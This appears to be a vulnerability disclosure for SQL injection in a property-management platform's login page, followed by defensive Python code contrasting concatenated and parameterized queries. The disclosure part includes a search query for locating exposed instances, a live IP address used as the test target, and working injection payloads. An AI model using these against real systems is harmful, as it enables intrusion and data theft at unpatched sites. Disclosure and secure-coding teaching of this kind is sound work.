CVE-2023-34735: Error based SQL injection in 物业云平台管理中心 Property Cloud Platform Management Center version 1.0 · Issue #4 · prismbreak/vulnerabilities
Property Cloud Platform Management Center 1.0 is vulnerable to error-based SQL injection.
1. Search for vulnerable products on the internet
Go to https://hunter.qianxin.com/ and use this syntax to search for potentially vulnerable products exposed on the internet: web.body="深圳市道尔智控科技股份有限公司"&&web.title="物业云平台登录页面"
This product is on the product list: https://www.drzk.cn/chanpinzhongxin/tccxt/
Source: https://aiqicha.baidu.com/copyright?pid=32990111708718&softId=copyright_79728905b610e9cd9e9c3dd154a77dd8
The target we are going to test is: http://121.15.128.203:8081/Login/Login.aspx
2. Exploitation
Because the backend code concatenates SQL statements and lacks input validation, we can trigger database errors to exploit this.
Insert the payloads below in the Username box and log in:
admin' and 1=(@@version)--+
admin' and 1=(select top 1 table_name from information_schema.tables)--+
The application throws an error and outputs the version of the SQL component and the tables.
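
The root cause named in step 2 (SQL built by concatenation, with database errors shown to the user) next to its fix, as an added example that is not code from this report or from the product. Python with an in-memory SQLite table stands in for the application's real backend, whose code the page does not show; every name and value is constructed.

```python
import hashlib
import hmac
import logging
import sqlite3

SALT = b"constructed-salt"  # constructed; real systems use a per-user random salt

def pw_hash(pw):
    return hashlib.pbkdf2_hmac("sha256", pw.encode(), SALT, 100_000).hex()

def make_db():
    # Constructed stand-in for the application's user table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT PRIMARY KEY, pw_hash TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)", ("admin", pw_hash("constructed-pw")))
    return db

def check(row, pw):
    # Constant-time comparison of the stored and the computed hash.
    return "ok" if row and hmac.compare_digest(row[0], pw_hash(pw)) else "denied"

def login_concatenated(db, name, pw):
    # Pattern described in the report: input spliced into the SQL text,
    # and the raw database error returned to the client.
    sql = "SELECT pw_hash FROM users WHERE name = '" + name + "'"
    try:
        return check(db.execute(sql).fetchone(), pw)
    except sqlite3.Error as exc:
        return "error: " + str(exc)

def login_parameterized(db, name, pw):
    # Hardened form: the value is bound as a parameter, so it is never parsed
    # as SQL; failures are logged server-side and the client sees a fixed message.
    try:
        row = db.execute("SELECT pw_hash FROM users WHERE name = ?", (name,)).fetchone()
    except sqlite3.Error:
        logging.exception("login query failed")
        return "error: login failed"
    return check(row, pw)

if __name__ == "__main__":
    db = make_db()
    for name in ("admin", "o'brien"):  # second value: a benign name containing a quote
        print(name, login_concatenated(db, name, "constructed-pw"),
              login_parameterized(db, name, "constructed-pw"), sep=" | ")
```

A benign username containing a single quote is enough to make the concatenated version return a database parser error, which is the signal to look for when reviewing or testing your own login handlers; the parameterized version simply answers "denied".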